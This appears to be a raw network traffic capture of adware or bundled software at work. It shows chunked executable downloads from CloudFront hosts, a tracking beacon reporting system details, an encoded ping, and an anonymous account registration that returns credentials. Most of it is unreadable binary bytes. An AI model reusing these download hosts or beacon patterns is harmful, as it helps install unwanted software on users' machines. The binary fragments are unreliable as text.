    ....=....<..hk,.....*..a..............'.@3.....<"~..F4..6.b...R.
    ......C].][email protected]$m:.vK=5..V.d ..CJ&.r.Q

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=5750000-5999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5750000-5999999/8693594
    Age: 4854
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: axomnN6nMgiO_j_syBEIz8QlY2RTR2ASFzILMxyWApEGlWCAKEboiA==
    .....Q.z_ _l......LoS.DT0.X1Bp........:..=/&...Gj...b~...W.M.%. p9.`..
    ...]....a....g..f=....W...U.............E.../i<...ke...).~........n
    ._..$.........W.......q...nC.y:g.r.._k.t?....v.....z......y..2.-u.. 1.
    .$..ZM....x)#@,(..N....S..b].$Q.*...6.{..$C.U.k.7.]...`...A...5c. ;.c&
    G{!...YN.......TeP..x'uP.DX.._[.A.oA6....'.H`-..E.........-.V6..).?..=
    "..dV......>O.z.kS..]....h.2..~!./..apW..M...z...S.W...<G...~I..
    .}.{8Mbh....V..d.!.E..6.........H ..........r...n. ....6L.T...`.{w.H._
    ...(.uV...,oW.jf.h>.w.s:[email protected])T..;..L..N.._T..J...dx9.?f.
    ..3c!......z.z...).. \B.q.e...d...NgCv..I....#fU.J..."...-..Ner...f...
    ..x..#0.~..?.jb..).Q.I.JoG...~. /...=..........z............f.."...J&g
    t;o..k.......P....^?x8Q.m.:......&....(k.........-...."...b..j.5..i|..
    .F.......r................DE.....?H.?_....p.&.._...I.&H............s6.
    $.v..Kru..v.[(!..y..n0..=...V.b...i$....sI..y....%-.y.n..?.J=..zYX4...
    8....:.F....Y,......*....d<Q.._..p^...<u....e..X)r.....l=w.L.|..
    W...N.-..^'a...s9..G..e.A.wzo.t)o.C....A./......._Ue,q.t.4........9..Y
    .t...-d...86|V... ?..{?H;.!...pS........cK....EUBx..w/.W4k..F....m..[o
    .jw6.....n..2.....B...&.[.K..H...)....G..*..|....F!.m..A...D..M.x..5.#
    .......*[email protected].&..~......mR|Bw9...:.i.......Fi7....y..D....v.X..HT..:
    ..r..>.......=.#bt.4.XL..>.,.........(.]X%u.I}..u.... y..*#..?r.
    K....QE.}........y......g..|.L.vY.....:.#.>.?qcU...*..E......ZS3...
    ..c.d.9.....\@....*.e..R....Z$(.......K...xV-h..L..}..6..".T...{$.....
    ...g..P...%."E.:Ah.{..Q......d.0D.Lb.f...tP...72Nm.,.......2.Jy.#"

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=6000000-6249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 6000000-6249999/8693594
    Age: 4856
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 91SuNxJhqw970jbWk1Kzx6FY5dc45m4m0Yp5bsclG9aj20lKmyDlFA==
    ......}.w...k.I......Z9~;..2!U.......*.tmv'I......B.....{....WE..R.%..
    ..Q]...Lv.ts#..M..>o...A..._8.......Y.GY..j7...."0....O..GN...W..P'
    _.p?p..%.....O.[ye...M......:.-..,3Y&..{.=.c..'.U.wrjl..nS.T.. n......
    .Xm.f.he.......e..hm..qMr.g........... ...........x..P...Z. ...'A...Z.
    [.X....fA.....).......S.!....QF.%..{..?.P....$../U.^......%.....:...C.
    Q.3.V,....r.X,.E...7..h.L..H.\..2.f...W..,....i..d2'......].oY;..,./..
    ......Qo..P...Y._...v..tbg...t..n-...UP<...>.\....!.D..Y..>7.
    I7...Y*....%*N.....F..y...........g..*.9.l.4.z`28...>..U&.U...C_. W
    .A.(.m...OM6V.E.O.{lpg.\MVa./..3P.;.Y..q...H...>G..cc'lrk.../.;H..O
    ...?..Z..*`.........!H..A..e.f...I..V....#.S.re...!H.T...0.y......].k.
    ....\8.*.U.v.@...@<...]..p]....`.........:.W.......Ng.C:.<R[l..Q
    ...`".......[..U `. ..l.)..:.n..A.. .9..G.F.-..9.w.R......V..E........
    !."C&s..QZ.E.......Q.j..T....<V..E..D.1.3...d.V.......!...?G<...
    _..{.>.....q.......6}..J.#d..s.t..Jz..t...h.....a.V$j.....P.*....s"
    .....k.<...]x;y.%.-....%Mz`e..B<.s........o.I0[=..........%...Hu
    D.Z...A..............;..R. ...%.S2.Jy..=..;..E.....J.....g...E8.,..U.\
    .. pWjQ..c..|...w.2..g...<....A....K...#..H.2Zr...Q.....4.J..E.] .O
    .....p.....m.gY$.....&"....J..'Sf.G....j.{j....D..K2 lY.y9.&,V.....'P.
    ...b9..=.....t...M.NM..(.\.^.....gp..G.^......er.....$EI....;m. ......
    cI...2.($:b!.'.J)..s......G..Y..V*.=.#.1.#..Y....#m\..-.|.L2w....@i...
    u,i..^.....^.].3DO....... .B.P.&..vI..ZQ. E.Ej."[email protected]^.
    [...........H....R=.L.x.ZGC..!!.f..w!...<.1.BT.., ..`Vo\....A..

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=6500000-6749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 6500000-6749999/8693594
    Age: 4857
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: ghg6A3XefSi9SVPInd0yP3Xu9kXxKYyjEDeQ72ThIiJjPBw3ExVCUA==
    ..<.I$...j..znX.$.........?]G...;yG....4 .ST.....J....L..G.........
    ....#..[S.R..e..0pl.U81...L....C.r...cBj..{..C8......2/...C...K.j..7.{
    ..[..H8_......'..]...g....8#..Y...4..v..v..)pxZ..X#..7?.h..y......-...
    !..X._....y..jQ...D.#..6.A.N. ....ou.'...o.]=v..4.l^..{.?.......N,...R
    L..A&...%(z.<[email protected]....... >h..*..n....*..9.Ea...t1&...Q.E..4.
    n.^.K...^(.GG}.... NNT..e.`Z....... .9.9.?$YL..Z.saI.. .=...X..V.>.
    .O.......?&.]{....7.g.....B.?...$...2...}.9.{.rT.uu>U......5...(,..
    ..A5...R..J.*.....~Y.N.J.....l.mg./%.{[email protected]......[
    .5.0..|.....#......o?u...61..$3w...DD>..J...kT>.x.n{.....|kF.Dho
    ...`T.c.......0....$M....f...:....$[P........Tn.*.f`7..\H....U........
    [email protected]..)..4 OH...r........ccgf.! ...y...'.m.x....w.-=.
    . .t...f...q.$.X..<j.zv o....\N..x..P...O....W... ....3os.qu.....K2
    .y.[..O.t..{.................|..!..i....7-w...z5.[..rG.\9..[.Eg....S2.
    C..{._...o Nr......... My...l..P.f.....b...:.{...w.u...YW..E.|8.}.S_x.
    ....._Fr..igW..D4..Uv.b......=...E....g...)Pqm.!....p.~........q.[.j-.
    L!f.k ...m)#F.......@........]A...?..o9.....t......O !.z.F.!..U(..C..V
    >.K..~{[SX....WP.N...b..>...FoH..e..E.v.............hz.e...\#.U.
    ...-...Frj...="B....:....>V...9..d..l....6.W_............j...nW.9.j
    .`c.. .1B......pzY.<...........4.-m.Y..V\A!.>D.J.......D.R....N.
    .0y..R....0rAz^..zw.[......Z.."=.M.....8..2..8...ZZ......U...i.......A
    ....Y_\......\"..LMm...G\.2l.YN.8.ty.%...M....l.p.... .GK..S..T.[.;...
    ...r.q,.... .*....v..j....a.....a..,..Pr.U.(<...r.....F...zQ.M.

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=7000000-7249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 7000000-7249999/8693594
    Age: 4860
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: s4O41Rxa7ydZS2eSXsLUYbi1x9Z4mHyuuGrc0JcTNY2tjP8K7JLBsQ==
    .7..9r.....E....z."..mS....s.c....E..aE3?...d}D.... ......#..W....h..#
    ........Un!m.M./..6..9...z/...w.|......hNN"@C..L..........fQ...`...iZ.
    .........GN....Q.~...s....gO.4J.v. .84.3.m.I....g..!......M^..d.$.. .=
    E.....}.W!...b$x.hc.Fwg...i8..&......!.2........NM..{.Z.*0..F.........
    ...!.xg..RDg.P.C.......M.l........Q>.Jd..5W.W...........[.v.5..r.W.
    ,m...L..{R.P.y4...KL@.}.i..h'Q.....N..6..2..T..........._..E.X.ZTF....
    .I.(....~....O.m).....;[email protected]..&..........iP..
    ..{....~Z.P..TH......n..............H......HN.9~......Q..K......x...e.
    @~..P..'.J..{.[1.w`D..MC.R...bb..A.X`.b.....;.,Q~)...g3.r...r2........
    [email protected]..]o1?{...O.}.,....G)..#..S Os.d'..$o..h.....Y....5.
    3..=A.........W..V.....U......V..kT...G...D..x.......` ...Z...n...-.L*
    .L.Hb.2d.........Q...:(..N,:z.,...Q...^.............1....?J[$....x.i4.
    .7gL.6R.7.....TB..)bD..rW..!7..........3..a..*}...e....&..h!.|.-....R.
    .. .F,.C...e..k-%...}..|#..:X.4E...V......dt......m_.. ..../.\.V.=....
    ..J.....=.|U...a.W.gk.xG.|*...'.GK?..0..S.XG..X&A....n .......%H.L...A
    ..,..a.,gN.....1.aSQ.{w.IQq...H=x.!.#..V......O.AO.g/'.c.K.:....[NZ.&.
    W...<.3........5By.._...eB...@..<43>..\..R<.q.Z.6..#q..:..
    .#.*....i.t....es.. f!..P.l..S.........V. .e.._.]lr..*.q.....fR\| ].!3
    ..YI.....u@U.......\............D.D6h.......S\zA.&.;[email protected]....\..5-..
    *.@D..>...3.'Z...u......3e2T.....<...$.s.(!.0efp.)$.]^W...e..E..
    .'.....'.....e.g<#[email protected]%8.......y.gZ..Y..JoC?..]X.........P!V....
    ..p.J...1{<..x...2J...(A..mSA...8.e.Y..4...&_.....tZ/$..}PX....

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=7500000-7749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 7500000-7749999/8693594
    Age: 4861
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: UB_Bs4PvlXRPLkh4URWP-PLe9Cog22MFdIRdBwUW3-qkKv2DSrZ3Tw==
    ...99.Y.....]......t..9L...fY..Y.Sc...k...N ..5..... ...9k..Z.NFX.G.Ns
    ...]..A...,5........N...S.|wT.1L.g.u=4. .$.S.JFm...=..&.L..9 ..U [email protected]
    ..&.J...9.L...?g...`..0W.D........8N0.n.D.<^...o....>m...F EM...
    [email protected].......#.b..Mv...D....8QRZ'..b.u...,(<..|.Q....PF-.
    TP....`Ej.......9.T.A.{.....x..jq.b.h../.$....5..2XO.j....k.6q8.B_9...
    X.d!6z..M9G.}|3>.F.,z.ojm..v..Y.s....y.....2........-.8.2&..y..r.a.
    ].=.....t.}..T.X.x...(.2^.A..XJ.....eX..8..I.(.6.(.5.>&......eX..$%
    _",..%...3..l..mm.=.L...1.9.}.. ....=.N.4...Z...{......, .....YG.;S...
    ...W...g............h..3....#...o.0.. B..6....|A.O..........WR..R..Ay.
    89..k.S..*.......~j....lO.Jd0|N..i..3&......7.S......'/]..@{.bG.,"`./.
    T......j._..2..X?Cy.5.4Z.T.(.:..9.YAx.|.[..!..j."....'.D.ha_....!...].
    ...F.'(.oia..&5.L..4U..|....8........-.IK"..sp.6m%....p.1...Jn.E...].5
    ..ms?.b.2.."...4..q..o$t.D...........%...yUf....Y..5rC.M...A..~...[...
    [email protected]..........^...|.p.".:#..%.?g..-....P.DySs.....C.(.>
    ;......~...........{.2}SMV.}.q..#........v%[..J4.....HBz..Y.$..csZ_.O.
    .....).........A(J&tQ...v{S]A.....7.......L`:.\..%.b]n.p..Ij.....$B?..
    #...-.zL....0.R.%&H....;.?1...."[email protected].`^..*{...WU
    ..3vby.vFPr.G.T.' 8.y.X...i......B.3Z...O7p#ZZ...Wa...vQ..i|PX,.....=.
    ...P.......92.o..R.....(\j.....ip..d...-3.d.mp@.......^a..k.6.........
    ....0.}BD.....k/.q..2....#.C.{(.=G._..z.JsM..NU.......>.M...3.,..0
    .]......65..0Jq.8...C..P.....i..~HX{. .i.... ....<'.~uS.e/[email protected]
    q.._-..j{.x;.{.....,.}[email protected].......}fD..TZ.J.w... 5

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=8000000-8249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 8000000-8249999/8693594
    Age: 4863
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: CRHIhxi_jx56ynzeS2dFdhDSgkE2C2uQUPSwI_i5AUJ8nDCzKTbnIQ==
    j....Q{[email protected]~..o..>4..]..Dz;..XT.K9qp.w....0]nvQ?..&.0.Jx.j..&
    gt;\........L...S!...?...|DL3:...8r..$.9k^".:..4.E.&....r!.~v.M..\k].U
    .y.d.Tj.D.......I..../....)59....7...^..._..y1K*l.I..W..6..Q....a...&
    .h-.f.go"...:.:.4....A^.WV..:6g...?pU...>...R.q|n..<.........HI.
    .........(V....-...G......#}...z......]...S*..*.....P9..5..DU5..J.Ci..
    I......}..R...>r`%.w.c..P......Y.p.J.QwZ.K..<.......L...g......\
    Fa........( h.g8.=o.........7T.....>.I..W..EW....91> >_.h....
    M..z..4d...\jfRm....|...& ..9U&.M..LZ.!..8.wqM...V1.....\]..8..#.@. ..
    ..O.........Q"....S.W.0..TY*=...n..^..3..HJ..!Bi.....l_#}.8...E.....F.
    86I.J.........q.|....l}..0..L....uBO..J..Q..)._k ..........p....u.~...
    ....e......4........0.; 8F.0}O.EJol;..>......Y..[...Zo*..t8........
    [...u.......*...A/...#./T.....[Pj....Os..*...X}..(.......4..b..=xz..t-
    ...r....S.8d....~.#[email protected]'[email protected][email protected]....
    6k g..[.>i......q.q.*..Z..]9`{G.o.i...9E...@.]....Ta2~..cPd...... .
    ...V......0rj.p.[...2.i..[.a.........M0.. Q......%:......&.\.`.....l..
    ....\.A3p..v.......`.T8..T&.V..->=....o.]....5..19............3..P.
    ......v...mD..b...A>w.#W....d..*PlC..o.5...f..e.2.'.....n..5..%.\.3
    ..o>..g....P.pO2...rw..8.~m..?M.Y.H.r.. .(%....:.q..#......U...~...
    _1 H..l..e&..G..*<.Y....>...i.H:.#...Pp..:.!BI....\..Y......_.6.
    .....U!.5.B?...q&..s7.....8...juJ..n..N...<)FH...v........ ;.^.Z...
    .......>.........{n......`[email protected]....
    L.i/..>8.......8c_. .b.|.....a*..D...5".3....w.....<.....P.l

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=8250000-8499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 8250000-8499999/8693594
    Age: 4865
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: XpEGT3cAh5P4LizThuGIlKwmV-1Uw1fFHIRa9Omgv9oqNcO3-X2v9g==
    ,..u.Kz...7O.d....W`. ....,B....Xu?5.Q.|~.0.28Bn.?s..q"pm.[..j.j.y!...
    ..x....g...n......6...'..X8tNj3.Un}.W.O..'...PqP..B?.c\............f..
    .......b..<.6.&iM...5..!..e}[email protected]@G.YsM.........
    ^T^..Y~ /Y..!`i.x.. &...--~ [email protected] ..[O(...0V]E....j_=x.....t..
    ../"......]:2../.k.B.c...0Q..E.2..........[..=QR.g}.......M.c...0.SA..
    .$..8..\K].X2.Ij...%......2.5..N..ba]..n..G.:8.'M..~...3t......9>.G
    .........kzk...........'.Z.BF/.....oq...F..I.L..e.D.n8].h.y..>...J.
    .....$...b..X$!.xS....f.uI......eR|P....n........l.}..#.. .f......;.t.
    .~..., ..........r.....<8_6.Y.G?Z@'V.._....."..[.8......$q....Z$.=g
    ..|..ll.........C'.....O..:.....!..&....M.R...8..n..I-%0g.F"..*{.-.Vb/
    ....'K ..s.........tu.h.<.A...sz..."/5fK......J*i...$..;&.....Y....
    v...8RV..n-..w.....k.<"m.....F.......v..7........S.. wC.....#.;*^.X
    ....a g........2..z9...:~..1Y..L?Ro.3..!....J.-.,..ARTS.....o....`....
    ..L..-4......Kj|.-.........G...=.ppe;...4............?.O..&\*..C......
    l....Z.."bH.>}.........I..;..6..T..#.&...k{Ew....lg.H.f.X;..[=J....
    :.v..w_.l2....zK.....i...P.:.z$.Mr...V=v?.%....$....Sq%eO..^..G...M8h.
    3..9....i..t....P..m....4ur-.......7rD....?.$..O...9.....k.h.........u
    e. ...k......Td.....2...6Z..mxaz...k....L.=..T...2.@~)A....m.x.(......
    .i......n....&iW.w.B.A7k.[.}ibzC...4..}}.r=..S.#..B2...F...K....D..i..
    .K.Ji@.. ..."..I........................=Ld..q..N=....9oy.......G.);t.
    .P....../<..W....A_!...\....yS......h..B.q.,....52 ........;../.hH.
    f$......3...B.cm..^.nX.......,.....R"7 5.R.y*.e.N.g.$c.]k).o...I^&

    <<< skipped >>>

    GET /monetization.gif?event=3&ibic=7F1D95218D1E4CF487AAD4B2A3E48467IE&verifier=1121c510e5f38d154df47b19458d540e&campaign=000046&app=32850&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908094&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&asw3=00000000000000000000000000000000&browser=ie,de HTTP/1.1
    Host: logs.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:03 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1344239556"
    Last-Modified: Mon, 06 Aug 2012 07:52:36 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1401908103.dop011.am4.t,1401908103.cds019.am4.c
    GIF89a.............,...........D..;..


    GET /app/ping.ashx?e=KC46TpkJIZzvtemz1TdLVuWnbh8hpWrAeq10/GADmDBu89fJv3K/CWQ14on7GBy1f82ojUnVmk1jg4jhBREgIvCV4d3G7GmUPoZDv5/7A 4Cbsn9VEgrCHCV2BSzkbCw3e14SYwGceQTCpS94p21WHD3jm6PAwKvD3T7xkgH4O7LOCiWPl5k0ouHKS7KUiLNWuHFN9lRYXm3sb/Jc9bi4CY6tkU PjWGlHVWy8T0I6XgvyObhcmYFVDq65iJ/PSiZue/pvWoG6/w1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVp3jd05TL7uAHr0KKVswpUMOZdMqy4QvCJDBHj1HSSAn7FonSkUF/RQKURfjHIrK99zMkIAxERs/2kYTsY1op3mQo22RHlSfKyHVloWsfii4 HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.youtubeaccelerator.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: image/gif
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:30 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: image/gif..Serv
    er: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.
    NET..Date: Wed, 04 Jun 2014 18:55:30 GMT..Content-Length: 0..


    GET /online/RegisterAnon.aspx?ProductID=12000&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList= HTTP/1.0
    User-Agent: CoreWinInet
    Host: online.GOOBZO.com
    Pragma: no-cache
    Cookie: ASP.NET_SessionId=gyq3hm5555rtu045g05eee55


    HTTP/1.1 200 OK
    Connection: close
    Date: Wed, 04 Jun 2014 18:55:31 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 98
    <RESULT>.<ANON>.<ID>9714b281-04df-4f52-935d-f743d527
    95b5</ID>.<PW>YcRnhe0a</PW>.</ANON>.</RESUL
    T>...


    GET /yta33_full.exe HTTP/1.1
    Range: bytes=0-249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 0-249999/5377936
    Age: 76471
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 3o8Ml1sFgBHRmdai_ulv9jaHV7xmChCaYL_ER8secHokzs98OoWt-Q==
    MZ......................@.............................................
    ..!..L.!This program cannot be run in DOS mode....$.......5..Yq...q...
    q...q...~.......t.......p.......p.......p...Richq...........PE..L.....
    .7......................Q.............. ....@.........................
    .0R.....-.R..............................!..5...D ..<[email protected]....
    .......Q..............................................................
    ..D............................text............................... ..
    `.rdata....... ......................@[email protected]...............
    [email protected][email protected].................@..@...................
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ...............................................U....x...SV.....W......
    V3.PS..4 @.......VP......P..0 @..=, @.SSj.Sj.......h....P......E...{..
    .......PV..( @[email protected]..$ @[email protected]
    .../...SSSj.S.u.... @.SSSj.P.E.... @....E......G.....MZ..t...MZ..u..x.
    .t..E.@.}.....|..M.SQh....P.u.... @.W... @..u..=. @....u...... @.j..E.
    Y3..}.V.........E.D...P......P..0 @..u.......".......F...:.t..."t.@...
    8"[email protected] [email protected]..< @.....E.P.E.PSSSSS...
    ...SP......P... @...t.j..u.... @.......P.. @._^3.[....:.t... t..H

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=500000-749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 500000-749999/5377936
    Age: 76473
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: lExijs83B3O7DtrzLvgi59cCFl6u85-3_r3-0auJ8HAGnuvzcdVVkg==
    ...y.;..fV.....<.......9..[%.x'3...2.r....\.@.*.....Zk....0g.i.....
    .h.c...'..yc.........#.y'3j...m.u.%..0.3`..&.>g . .....?'D.......I.
    ...$odW..A..^..W.E...0.....f..7."..K..._.U..!...A.....^q.f.>'2..o..
    Je..x...........8.,..O..I...t..BL}3......R... _j.\ze.d.....<2b...Y.
    ..8......Dg.zL[..8...l/.Ke.........?........%..x..fv.n$.O.4.R.[.;.r.3.
    ].Ah.CM=3..^.%...^c..LP..8....TD. Bk...I...^..~...F..<..u.e...8l7.L
    ....&1...|..Eo.*..L>..ka&%.w....a.`6..X6r.T...Y..F....FzWO.d...!#..
    ..!h..:..H.C.g...#.6#;..?.8..=.O..A.z....Y.Y..x.9. .S....A.q8O......B@
    .P.F.. ..`9. ..~....3........!...#..d...%.9.X.s$./8M.................*
    .e....]8?....=.....e......YU..C.....)I.R.T.0|...h...=.-.S.G..vz.%...{.
    ...;K.vN).)..C#.k.uA!P.C.....).s. ..Y.`.?J.......AC......l......_S.%..
    5..../9...{....../3j..L.&.. Q......Q..;.{.....wR....y.O.31..}.....F.^.
    T ...i.'._.O\./...%.R...Pfa...I.B..;....<..tD|....|.....og..a....6I
    ...U5..$$......&U....K.....s.WH....g..?^...b...IS...\I!.5...=...<..
    ...oy2..g=..T...?`...I.v..Q5]..x.~B ....Q.(."7c..x..Y.....[.5/.;*..S..
    N.S~.I8f....P>w..}N.z.......#}.j..3......B....{......]..8H..zT.z...
    .:..,e;..J.<..........1...I../$.n\"!D..&...QJ....t.g.f .....*O._..R
    .......).*).....CM....'.).kN.O.'s..:..)...?tK1_.f..'p...Z.Y..9.^-..ld.
    .|...Z].U.......t_h..= e.);......3...a.s.bY.......5..~Am.g... .kW..'.
    .._.....)jS..._..B..5....>...|..".t(.F...vm.]d.?.O.)..c....C .iQCus
    ...>.P.w.w...]3......h.......!P..O.kq'.]..7.F.jQ-=.}ZVEdY..%{.1.&..
    ..).....^UGt...G^...6.s....R...[..R.....!..`....]k".}....;x.......

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=1000000-1249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1000000-1249999/5377936
    Age: 76477
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: L8wUm1YecWAd8jYJYUJ_C--elQPqhnxGLm37uI7pdZ5QkRCI8xUKVQ==
    ......vf...J..~.KM.9jp.7KV&..d.....u1.n.$VDB..j.(....o.dm.v..}.4....%s
    .`.n.........1"....B'...W...0}/...........u.N."_.........2E..D.....Wl.
    ...8..... !'.S.X.W2;......9.lt..7(..c..AM...86w..a.|.V.S..mE6.|2[...C&
    lt;......?...?.D.........Y......*..._1,M..3.s.....0.....{.Id.r....!..q
    .\.B.;...gU.k3... .....7.....K2T.SHT2....e.yD3X.....=.oy5j.A..Z...*...
    ^.1l.....{.P...Z........#[email protected][[email protected].....`
    .=..(........|..j.....)Zo$....i..gm....F5.x...@[email protected]"vK....R
